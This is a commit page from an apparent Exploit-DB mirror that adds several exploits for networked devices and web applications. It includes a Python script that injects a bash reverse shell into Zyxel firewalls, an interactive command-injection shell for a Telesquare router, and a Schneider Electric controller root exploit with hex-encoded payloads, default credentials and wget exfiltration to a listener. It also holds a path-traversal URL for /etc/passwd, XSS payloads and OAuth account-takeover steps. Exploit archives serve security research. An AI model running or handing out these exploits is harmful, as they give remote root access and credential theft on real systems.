bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2022-06-04

Browse source 
7 changes to exploits/shellcodes

Zyxel USG FLEX 5.21 - OS Command Injection
Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
SolarView Compact 6.00 - Directory Traversal
Contao 4.13.2 - Cross-Site Scripting (XSS)
Microweber CMS 1.2.15 - Account Takeover
This commit is contained in:
Offensive Security 2022-06-04 05:01:36 +00:00
parent 79ae41201e
commit 3daddca955
8 changed files with 533 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

91
exploits/hardware/remote/50946.txt Normal file
View file

@ -0,0 +1,91 @@
# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse
parser = argparse.ArgumentParser(
prog="CVE-2022-30525.py",
description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()
banner = (
"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
"biA6KSApCg=="
)
def main():
print("\n" + base64.b64decode(banner).decode("utf-8"))
if None in vars(args).values():
print(f"[!] Please enter all parameters !")
parser.print_help()
sys.exit()
if "http" not in args.url:
args.url = "https://" + args.url
args.url += "/ztp/cgi-bin/handler"
exploit(args.url, args.host, args.port)
def exploit(url, host, port):
headers = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Content-Type": "application/json",
}
data = {
"command": "setWanPortSt",
"proto": "dhcp",
"port": "4",
"vlan_tagged": "1",
"vlanid": "5",
"mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
"data": "hi",
}
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
try:
response = requests.post(
url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
)
except (KeyboardInterrupt, requests.exceptions.Timeout):
print("[!] Bye Bye hekcer !")
sys.exit(1)
finally:
try:
print("[!] Can't exploit the target ! Code :", response.status_code)
except:
print("[!] Enjoy your shell !!!")
if __name__ == "__main__":
main()

97
exploits/hardware/remote/50948.py Executable file
View file

@ -0,0 +1,97 @@
#!/usr/bin/python3
# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: http://telesquare.co.kr/
# CVE : CVE-2021-46422
# Authentication Required: No
import requests
import argparse
import sys
from xml.etree import ElementTree
def sysArgument():
ap = argparse.ArgumentParser()
ap.add_argument("--host", required=True, help="target hostname/IP")
args = vars(ap.parse_args())
return args['host']
def checkHost(host):
url = "http://" + host
print("[*] Checking host is it alive?")
try:
rsl = requests.get(url)
print("[*] The host is alive.")
except requests.exceptions.Timeout as err:
raise SystemExit(err)
def exploit(host):
url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="
#checking does the CGI exists?
rsl = requests.get(url)
if(rsl.status_code == 200):
print("[*] CGI script exist!")
print("[*] Injecting some shell command.")
#1st test injecting id command
cmd = "id"
try:
rsl = requests.get(url + cmd, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)
cmdRet = []
for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
cmdRet.append(elem.text)
except:
print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
sys.exit(0)
if(len(cmdRet) != 0):
print("[*] There's response from the CGI script!")
print('[*] System ID: ' + cmdRet[0].strip())
print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
#start shell iteration
while(True):
cmdInput = input("[SDT-CW3B1 Shell]# ")
if(cmdInput == ".exit"):
print("[*] Exiting shell.")
sys.exit(0)
rsl = requests.get(url + cmdInput, stream=True)
xmlparser = ElementTree.iterparse(rsl.raw)
for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
print(elem.text.strip())
print('\n')
else:
print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
sys.exit(0)
else:
print("[!] CGI script not found.")
print(rsl.status_code)
sys.exit(0)
def main():
host = sysArgument()
checkHost(host)
exploit(host)
if __name__ == "__main__":
main()

281
exploits/hardware/remote/50949.py Executable file
View file

@ -0,0 +1,281 @@
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
#
#
# Vendor: Schneider Electric SE
# Product web page: https://www.se.com | https://www.clipsal.com
# Product details:
# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
# Affected version: CLIPSAL 5500SHAC (i.MX28)
# CLIPSAL 5500NAC (i.MX28)
# SW: 1.10.0, 1.6.0
# HW: 1.0
# Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
# SpaceLogic C-Bus
#
# Summary: The C-Bus Network Automation Controller (5500NAC) and the Wiser
# for C-Bus Automation Controller (5500SHAC)) is an advanced controller from
# Schneider Electric. It is specifically designed to unite the C-Bus home
# automation solution with common household communication protocols, from
# lighting and climate control, to security, entertainment and energy metering.
# The Wiser for C-Bus Automation Controller manages and controls C-Bus systems
# for residential homes or zones within a building and integrates functions
# such as heating/cooling, energy/load monitoring and remote control for C-Bus
# and Modbus.
#
# Desc: The automation controller suffers from an authenticated arbitrary
# command execution vulnerability. An attacker can abuse the Start-up (init)
# script editor and exploit the 'script' POST parameter to insert malicious
# Lua script code and execute commands with root privileges that will grant
# full control of the device.
#
# ------------------------------------------------------------------------------
# $ ./c-bus.py http://192.168.0.10 "cat /etc/config/httpd;id" 192.168.0.37 8888
# ----------------------------------------------------------------------
# Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at 15.03.2022 11:26:38
# [*] Starting exfiltration handler on port 8888
# [*] Writing Lua initscript... done.
# [*] Running os.execute()... done.
# [*] Got request from 192.168.0.10:33522
# [*] Printing target's request:
#
# b"GET / HTTP/1.1\r\nHost: 192.168.0.37:8888\r\nUser-Agent: \nconfig user
# 'admin'\n\toption password 'admin123'\n\nconfig user 'remote'\n\toption
# password 'remote'\n\nuid=0(root) gid=0(root) groups=0(root)\r\nConnection:
# close\r\n\r\n"
#
# [*] Cleaning up... done.
#
# $
# ------------------------------------------------------------------------------
#
# Tested on: CPU model: ARM926EJ-S rev 5 (v5l)
# GNU/Linux 4.4.115 (armv5tejl)
# LuaJIT 2.0.5
# FlashSYS v2
# nginx
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5707
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5707.php
#
#
# 12.03.2022
#
import threading#!
import datetime##!
import requests##!
import socket####!
import time######!
import sys#######!
import re########!
from requests.auth import HTTPBasicAuth
from time import sleep as spikaj
class Wiser:
def __init__(self):
self.headers = None
self.uri = '/scada-main/scripting/'
self.savs = self.uri + 'save'
self.runs = self.uri + 'run'
self.start = datetime.datetime.now()
self.start = self.start.strftime('%d.%m.%Y %H:%M:%S')
self.creds = HTTPBasicAuth('admin', 'admin123')
def memo(self):
if len(sys.argv) != 5:
self.use()
else:
self.target = sys.argv[1]
self.execmd = sys.argv[2]
self.localh = sys.argv[3]
self.localp = int(sys.argv[4])
if not 'http' in self.target:
self.target = 'http://{}'.format(self.target)
def exfil(self):
print('[*] Starting exfiltration handler on port {}'.format(self.localp))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', self.localp))
while True:
try:
s.settimeout(9)
s.listen(1)
conn, addr = s.accept()
print('[*] Got request from {}:{}'.format(addr[0], addr[1]))
data = conn.recv(2003)
print('[*] Printing target\'s request:')
print('\n%s' %data)
except socket.timeout as p:
print('[!] Something\'s not right. Check your port mappings!')
break
s.close()
self.clean()
def mtask(self):
konac = threading.Thread(name='thricer.exe', target=self.exfil)
konac.start()
self.byts()
def byts(self):
self.headers = {
'Referer':self.target+'/scada-main/main/editor?id=initscript',
'Sec-Ch-Ua':'"(Not(A:Brand";v="8", "Chromium";v="98"',
'Cookie':'x-logout=0; x-auth=; x-login=1; pin=',
'Content-Type':'text/plain;charset=UTF-8',
'User-Agent':'SweetHomeAlabama/2003.59',
'X-Requested-With':'XMLHttpRequest',
'Accept-Language':'en-US,en;q=0.9',
'Accept-Encoding':'gzip, deflate',
'Sec-Ch-Ua-Platform':'"Windows"',
'Sec-Fetch-Site':'same-origin',
'Connection':'keep-alive',
'Sec-Fetch-Dest':'empty',
'Sec-Ch-Ua-Mobile':'?0',
'Sec-Fetch-Mode':'cors',
'Origin':self.target,
'Accept':'*/*',
'sec-gpc':'1'
}
self.loada = '\x64\x61\x74\x61\x3D\x7B' # data={
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x34\x22\x3A\x22\x22\x2C' # "ext-comp-1004":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35\x22\x3A\x22\x22\x2C' # "ext-comp-1005":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x22\x3A\x22\x22\x2C' # "ext-comp-1006":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x37\x22\x3A\x22\x22\x2C' # "ext-comp-1007":"",
self.loada += '\x22\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x38\x22\x3A\x22\x22\x2C' # "ext-comp-1008":"",
self.loada += '\x22\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70\x2D\x73\x65\x61\x72\x63\x68\x22\x3A\x22\x22\x2C' # "scada-help-search":"",
self.loada += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x2C' # "id":"initscript",
self.loada += '\x22\x73\x63\x72\x69\x70\x74\x22\x3A\x6E\x75\x6C\x6C\x2C' # "script":null,
self.loada += '\x22\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C\x79\x22\x3A\x22\x74\x72\x75\x65\x22\x7D' # "scriptonly":"true"}
self.loada += '\x26\x73\x63\x72\x69\x70\x74\x3D\x6F\x73\x2E\x65\x78\x65\x63\x75\x74\x65' # &script=os.execute
self.loada += '\x28\x27\x77\x67\x65\x74\x20\x2D\x55\x20\x22\x60' # ('wget -U "`
self.loada += self.execmd # [command input]
self.loada += '\x60\x22\x20' # `".
self.loada += self.localh+':'+str(self.localp) # [listener input]
self.loada += '\x27\x29' # ')
self.loadb = '\x64\x61\x74\x61\x3D\x7B' # data={
self.loadb += '\x22\x69\x64\x22\x3A\x22\x69\x6E\x69\x74\x73\x63\x72\x69\x70\x74\x22\x7D' # "id":"initscript"}
print('[*] Writing Lua initscript... ', end='')
sys.stdout.flush()
spikaj(0.7)
htreq = requests.post(self.target+self.savs, data=self.loada, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(17)
else:
print('done.')
print('[*] Running os.execute()... ', end='')
sys.stdout.flush()
spikaj(0.7)
htreq = requests.post(self.target+self.runs, data=self.loadb, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(19)
else:
print('done.')
def splash(self):
Baah_loon = '''
######
##########
###### _\_
##===----[.].]
#( , _\\
# )\__|
\ /
`-._``-'
>@
|
|
|
|
| Schneider Electric C-Bus SmartHome Automation Controller
| Root Remote Code Execution Proof of Concept
| ZSL-2022-5707
|
|
|
'''
print(Baah_loon)
def use(self):
self.splash()
print('Usage: ./c-bus.py [target] [cmd] [lhost] [lport]')
exit(0)
def clean(self):
print('\n[*] Cleaning up... ', end='')
sys.stdout.flush()
spikaj(0.7)
self.headers = {'X-Requested-With':'XMLHttpRequest'}
self.blank = '\x64\x61\x74\x61\x3D\x25\x37\x42\x25\x32\x32'
self.blank += '\x65\x78\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30'
self.blank += '\x30\x34\x25\x32\x32\x25\x33\x41\x25\x32\x32'
self.blank += '\x25\x32\x32\x25\x32\x43\x25\x32\x32\x65\x78'
self.dlank = '\x74\x2D\x63\x6F\x6D\x70\x2D\x31\x30\x30\x35'
self.dlank += '\x25\x32\x32\x25\x33\x41\x25\x32\x32\x25\x32'
self.dlank += '\x32\x25\x32\x43\x25\x32\x32\x65\x78\x74\x2D'
self.dlank += '\x63\x6F\x6D\x70\x2D\x31\x30\x30\x36\x25\x32'
self.clank = '\x32\x25\x33\x41\x25\x32\x32\x25\x32\x32\x25'
self.clank += '\x32\x43\x25\x32\x32\x65\x78\x74\x2D\x63\x6F'
self.clank += '\x6D\x70\x2D\x31\x30\x30\x37\x25\x32\x32\x25'
self.clank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
self.slank = '\x25\x32\x32\x65\x78\x74\x2D\x63\x6F\x6D\x70'
self.slank += '\x2D\x31\x30\x30\x38\x25\x32\x32\x25\x33\x41'
self.slank += '\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25\x32'
self.slank += '\x32\x73\x63\x61\x64\x61\x2D\x68\x65\x6C\x70'
self.glank = '\x2D\x73\x65\x61\x72\x63\x68\x25\x32\x32\x25'
self.glank += '\x33\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43'
self.glank += '\x25\x32\x32\x69\x64\x25\x32\x32\x25\x33\x41'
self.glank += '\x25\x32\x32\x69\x6E\x69\x74\x73\x63\x72\x69'
self.hlank = '\x70\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32'
self.hlank += '\x73\x63\x72\x69\x70\x74\x25\x32\x32\x25\x33'
self.hlank += '\x41\x25\x32\x32\x25\x32\x32\x25\x32\x43\x25'
self.hlank += '\x32\x32\x73\x63\x72\x69\x70\x74\x6F\x6E\x6C'
self.flank = '\x79\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74'
self.flank += '\x72\x75\x65\x25\x32\x32\x25\x37\x44'#######'
self.clear = f'{self.blank}{self.dlank}{self.clank}{self.slank}{self.glank}{self.hlank}{self.flank}'
htreq = requests.post(self.target+self.savs, data=self.clear, headers=self.headers, auth=self.creds)
if not 'success' in htreq.text:
print('didn\'t work!')
exit(18)
else:
print('done.')
exit(-1)
def main(self):
print('-'*70)
print('Starting Z-Bus 2.5.1 ( https://zeroscience.mk ) at', self.start)
self.memo(), self.mtask()
if __name__ == '__main__':
Wiser().main()

13
exploits/hardware/remote/50950.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: SolarView Compact 6.00 - Directory Traversal
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Author linkedin profile : https://www.linkedin.com/in/ahmedalroky/
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29298
# Tested on: Windows
# Exploit: http://IP_ADDRESS/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg

4
exploits/multiple/webapps/49298.txt
View file

@ -5,11 +5,11 @@
# Tested on Win10 and Google Chrome
# Exploit Author: Vinicius Alves
# XSS Payload: "><h1>STORED XSS</h1> (Scripts tag blocked)
# XSS Payload: </script><svg onload=alert();>
1) Access LMS and log in to admin panel
2) Access courses page
3) Open course manager and SEO menu
4) Paste the XSS Payload tag and Submit
5) Access the course page on frontend
6) Exploited!
6) Trigged!

18
exploits/php/webapps/50945.tzt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ]
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
---------------
Steps to reproduce:
Navigate to the below URL
URL: https://localhost/contao/"><svg//onload=alert(112233)>

25
exploits/php/webapps/50947.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Microweber CMS 1.2.15 - Account Takeover
# Date: 2022-05-09
# Exploit Author: Manojkumar J
# Vendor Homepage: https://github.com/microweber/microweber
# Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15
# Version: <=1.2.15
# Tested on: Windows10
# CVE : CVE-2022-1631
# Description:
Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth
Misconfiguration Leads To Account Takeover.
# Steps to exploit:
1. Create an account with the victim's email address.
Register endpoint: https://target-website.com/register#
2. When the victim tries to login with default Oauth providers like Google,
Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login)
with that same e-mail id that we created account before, via this way we
can take over the victim's account with the recently created login
credentials.

6
files_exploits.csv
View file

@ -18697,6 +18697,10 @@ id,file,description,date,author,type,platform,port
50930,exploits/hardware/remote/50930.py,"Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Minh Khoa",remote,hardware,
50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
50940,exploits/hardware/remote/50940.txt,"SolarView Compact 6.0 - OS Command Injection",1970-01-01,"Ahmed Alroky",remote,hardware,
50946,exploits/hardware/remote/50946.txt,"Zyxel USG FLEX 5.21 - OS Command Injection",1970-01-01,"Valentin Lobstein",remote,hardware,
50948,exploits/hardware/remote/50948.py,"Telesquare SDT-CW3B1 1.1.0 - OS Command Injection",1970-01-01,"Bryan Leong",remote,hardware,
50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",1970-01-01,LiquidWorm,remote,hardware,
50950,exploits/hardware/remote/50950.txt,"SolarView Compact 6.00 - Directory Traversal",1970-01-01,"Ahmed Alroky",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -45007,3 +45011,5 @@ id,file,description,date,author,type,platform,port
50942,exploits/php/webapps/50942.txt,"OpenCart v3.x Newsletter Module - Blind SQLi",1970-01-01,"Saud Alenazi",webapps,php,
50943,exploits/php/webapps/50943.py,"m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Malte V",webapps,php,
50944,exploits/php/webapps/50944.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)",1970-01-01,RedHatAugust,webapps,php,
50945,exploits/php/webapps/50945.tzt,"Contao 4.13.2 - Cross-Site Scripting (XSS)",1970-01-01,"Chetanya Sharma",webapps,php,
50947,exploits/php/webapps/50947.txt,"Microweber CMS 1.2.15 - Account Takeover",1970-01-01,"Manojkumar J",webapps,php,

Can't render this file because it is too large.